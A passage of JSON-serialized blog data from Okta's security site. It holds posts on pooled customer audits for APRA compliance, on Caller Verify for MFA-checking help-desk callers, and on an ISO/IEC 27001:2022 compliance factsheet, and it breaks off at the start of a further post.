\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"ordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The result wasn't just a compliance checkmark — based on the feedback captured, \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"90%\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" of participating customers left with significantly higher confidence in their ability to demonstrate their organization’s compliance to the APRA regulation. Since launch, we’ve realized the following program benefits:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Fostering Trust \",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This one-to-many model eradicates the heavy resource strain of one-to-one, repetitive audits. Our customers are at the heart of everything we do. It is important to highlight how Okta builds trust by demonstrating our robust security. As Okta continues to grow and is now considered a critical outsource provider, this pooled audit model is helping more customers meet regulatory obligations. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Deeper collaboration and shared insights\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our program introduces a change from the standard private audit model by introducing opportunities to engage with industry peers and share learnings. 
Okta’s in-person audit setting helps support the fostering of new connections and strengthening existing relationships, enabling a forum to share best practices and gain invaluable insights from both Okta and pooled audit participants.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Proactivity versus reactivity\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"While these new regulations don't directly impact Okta, we take a proactive approach by engaging our customers directly when new regulations emerge. By helping them understand how Okta's security controls apply and effectively address new requirements, we can support them in their compliance adherence efforts.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Measuring What Matters\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Measuring the success of pooled audit programs not only gives our security team and leadership insight into what is driving concerns for customers, but also how we can improve future sessions.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Most recently,\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" 90%\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" of APRA pooled audit participants reported high program effectiveness, and \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"94% \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"reported increased confidence in Okta as a security partner. Our program’s mandate is to build lasting trust and strengthen partnerships. 
Here’s what our customers are saying about us:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"“I like the concept of the pooled audit. It was good to have the Okta team outline the control environment to help us to complete our obligation requirements. It was good to connect with other customers that are in similar positions.” - Senior Manager at a global financial services company\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"“The information sharing was open and questions were answered well and comprehensively.” - Technology Risk Manager at a globally recognized financial services company\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"“Okta/Auth0 is a key service provider for our business services. It was good to understand the security controls and evidence shown in the pooled audit which demonstrates the security posture and maturity across Okta/Auth0.” - Head of Security Strategy and Architecture at a global retail payment company\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"“The openness of Okta in sharing information has supported our compliance journey. The session allowed us to get better insights and comfort around how a key partner is ensuring the security and continuity of services to its customers. 
Opening discussion and being able to gain clarification directly from senior leaders.” - Senior Operational Risk Manager at a global retail payment company\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"“The face-to-face engagement was excellent, and Okta's collaborative approach was a significant benefit. We feel it's truly important to foster this trusted relationship and to continue growing more secure together.” – EU Customer \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our Future Vision\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We’re focused on continuing to expand our Customer Audit program across new industries and regions, opening the program benefits to additional customers outside of Financial Services. We believe a world-leading SaaS identity service can support their success. We’re committed to supporting our customers through the evolving and complex regulatory landscape they face.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This journey toward scalable assurance is bigger than Okta. We’re calling on our peers in the security SaaS community to join in on these efforts. Are you exploring pooled audits or similar collaborative models? 
Reach out at \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"mailto:customertrust@asqula.com\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"customeraudit@asqula.com\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" to collaborate on audit-based insights and accelerate the industry's progress for all customers. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"By openly sharing our collective expertise and challenges, we can create a more trusted, secure ecosystem for everyone. We welcome your feedback and partnership as we build this new standard, together.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"}},{"updatedAt":"2025-06-18T17:25:51.381Z","slug":"/articles/2025/06/building-confidence-in-support-comms-with-caller-verify-at-okta","node_locale":"en","date":"2025-06-18T00:00","secAuthor":[{"name":"Carmen Girardin","slug":"/hackers/carmen-girardin","jobTitle":"Manager, Security Communications","id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"<p>Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. 
Carmen spends her downtime traveling, thrifting for treasures and reading.</p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#b8b8b8","width":58,"height":58}}}],"title":"Building Confidence in Support Comms with Caller Verify at Okta","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"The days when the name of your childhood best friend or your first car model provided enough assurance to validate your 
identity are long gone. That’s where Caller Verify can help."},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In many of the most impactful incidents of the past two years, attackers gained privileged access to systems by tricking IT support personnel into resetting the passwords and MFA factors of system administrators.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Armed with access to privileged accounts, attackers were able to expand their access further by accessing directories of hashed passwords (NTDS.dit) stored in every Microsoft Active Directory environment. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In most organizations, the challenge is how to validate the identity of callers to internal help desks or other technical teams before performing user lifecycle events. The days when the name of your childhood best friend or your first car model provided enough assurance to validate your identity are long gone.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"So, when an employee does call for help, how do technical support personnel validate with confidence that the caller on the line is who they say they are? 
These processes need to be revisited, especially given recent advances in “deepfake” technology.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"That’s where Caller Verify can help.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"What is Caller Verify?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.callerverify.com/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Caller Verify\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" is an application that enables IT support to extend the multi-factor authentication prompts available via Okta Verify to quickly and securely verify the identity of inbound callers. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify is a third-party-developed application awarded Okta’s \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.asqula.com/blog/2024/10/okta-partner-awards-celebrating-our-2024-partner-award-winners/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"“2024 AMER Rising Star Partner of the Year” winner\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". 
It can integrate with ITSM and CRM solutions, such as ServiceNow or Salesforce, to require that all inbound callers satisfy an MFA challenge before a support ticket is unlocked for use.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify is compliant with the following regulations:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.osfi-bsif.gc.ca/en/guidance/guidance-library/technology-cyber-risk-management\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Office of the Superintendent of Financial Institutions (OSFI) Guideline B-13 Technology and Cyber Risk Management\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", subsection 3.2.7 Defend\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.hhs.gov/hipaa/for-professionals/privacy/laws-regulations/index.html\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Health Insurance Portability and Accountability Act (HIPAA)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" Security Rule, 45 CFR § 164.308(a)(1)(ii)(D)\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.pcisecuritystandards.org/standards/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Payment Card Industry Data Security Standard (PCI 
DSS)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Requirement 7.1\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://gdpr-info.eu/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"General Data Protection Regulation (GDPR)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Article 32\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63-3.html\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"National Institute of Standards and Technology (NIST)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Level 3\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This solution allows Okta IT admins to enhance our employee experience with a timely response to confident, authenticated communications. By sending a prompt to the caller using Okta Verify, the technical support team can validate the caller’s identity before providing any level of assistance, protecting both the organization and the user.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta’s Use Case\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta integrated Caller Verify into various IT support processes well over 12 months ago. 
Our use of Caller Verify ensures that only authorized employees can ask IT support to perform sensitive operations that involve an Okta account.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In line with Okta’s \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.asqula.com/fr-fr/newsroom/press-releases/introducing-the-okta-secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"ongoing commitment \",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\"to hardening our corporate infrastructure, Okta requires that users satisfy all authentication challenges using phishing-resistant authentication methods (such as FastPass with an Okta Verify-enrolled device, or a registered YubiKey), including the challenges required to open a support request.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Stay secure\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify plays an important role in Okta’s end-to-end ability to protect all enrollment, authentication and recovery flows with phishing-resistant authentication. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To learn about Okta’s use of ID Verification to secure enrollment and recovery, read on for \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/02/how-okta-embraces-identity-verification-using-persona/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"how we leverage Okta’s integration with Persona\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"}},{"updatedAt":"2025-06-19T20:55:40.460Z","slug":"/articles/2025/06/enabling-iso27001-compliance-with-okta","node_locale":"en","date":"2025-06-04T00:00","secAuthor":[{"name":"Gemma Parkes","slug":"/hackers/gemma-parkes","jobTitle":"Security Assurance Analyst","id":"5d49800b-59a6-5c33-b25f-79ad8ce4b228","bio":{"bio":"<p> Gemma Parkes is a Security Assurance Analyst in the EMEA region at Okta. The Customer Assurance team within Security Trust & Culture supports Okta’s growing customer base with inquiries pertaining to security and compliance. Working within the defence and aerospace industry, then moving to global corporations supporting public and private sector customers, Gemma has gained extensive experience in implementing and managing security frameworks and associated security practices. Backed by over 20 years of experience in security governance, risk management, and compliance, she now enjoys working collaboratively to provide strategic support to Okta’s customers and prospects. 
In her downtime, Gemma enjoys spending time with her family and going to the theatre.</p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#a89878","width":58,"height":58}}}],"title":"Enabling ISO/IEC 27001:2022 Compliance with 
Okta","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"ISO/IEC 27001 is a globally recognized security standard. This blog introduces a new Factsheet that provides guidance on how Okta can support organizations of any size in achieving or maintaining compliance to the ISO/IEC 27001:2022 standard."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001 continues to be a globally recognized security standard and a consistently popular choice for today’s organizations seeking to demonstrate robust security controls and the effectiveness of their Information Security Management Systems (ISMS). This blog introduces a new Factsheet that provides guidance on how Okta can support organizations of any size in achieving or maintaining compliance to the ISO/IEC 27001:2022 standard.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is ISO/IEC 27001:2022?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001 is an international standard for information security management. It provides a framework for organizations to follow to establish, implement, monitor, and maintain an effective Information Security Management System (ISMS). 
The standard consists of security controls, which are divided into groups of:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizational, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"People,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Physical, and \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technological controls.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The 2022 iteration of the standard introduced “Operational Capabilities” such as Identity and Access Management (IAM). By implementing applicable IAM controls in an organization’s environment, it can be demonstrated that best practices are being followed for securing information, data, and assets.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta supports compliance to ISO/IEC 27001:2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Auth0 are ISO27001:2022-compliant. Our platforms can also support organizations in achieving or maintaining their compliance to the ISO/IEC 27001:2022 standard. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To guide our customers on how Okta can support, we’ve recently released a helpful new resource: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/?itemUid=6217dabc-952b-4163-b19b-8372a8de7d4d&source=click\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ISO/IEC 27001:2022 Compliance with Okta Platform Factsheet\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". This Factsheet provides an overview of ISO27001’s benefits and a detailed summary of how Okta’s products provide a unified approach in compliance adherence to IAM-specific and other controls. Keeping our customers in mind, we’ve methodically documented our guidance in three key sections:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta Supports IAM Controls\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta Supports Non-IAM Specific Controls\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001:2022 Reporting Requirements\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Each section is strategically mapped to Okta products that support adhering to the controls, as presented. 
Leveraging the control guidance of the Factsheet can benefit all Okta customers, even organizations not currently targeting adherence to these controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More on Compliance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta upholds a strong compliance framework to demonstrate our commitment to maintaining highly available, secure, and resilient products and services. Many of these controls are embedded in Okta’s business-as-usual activities. We invite you to visit our new Factsheet, as well as our latest independent audit reports and other security compliance-related documents on our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.asqula.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and all available documentation is accessible to customers and prospects of Okta. 
Site visitors can view Okta’s certifications and access industry-standard questionnaires. To learn more about our efforts, read our blog article, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Empowering Security with Customer Trust Solutions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".  Keep watching as we publish additional helpful resources; more to come.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Disclaimer: While this article discusses certain legal concepts, it does not constitute legal advice. It is provided for informational purposes only. For legal advice regarding your organization's compliance needs, please consult your organization's legal department. Okta makes no representations, warranties, or other assurances regarding the content of this article. Information regarding Okta's contractual assurances to its customers can be found at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://asqula.com/agreements\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"asqula.com/agreements\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"}},{"updatedAt":"2025-05-28T16:02:25.114Z","slug":"/articles/2025/05/oktas-secure-by-design-pledge-one-year-on","node_locale":"en","date":"2025-05-22T00:00","secAuthor":[{"name":"David Bradbury","slug":"david-bradbury","jobTitle":"Chief Security 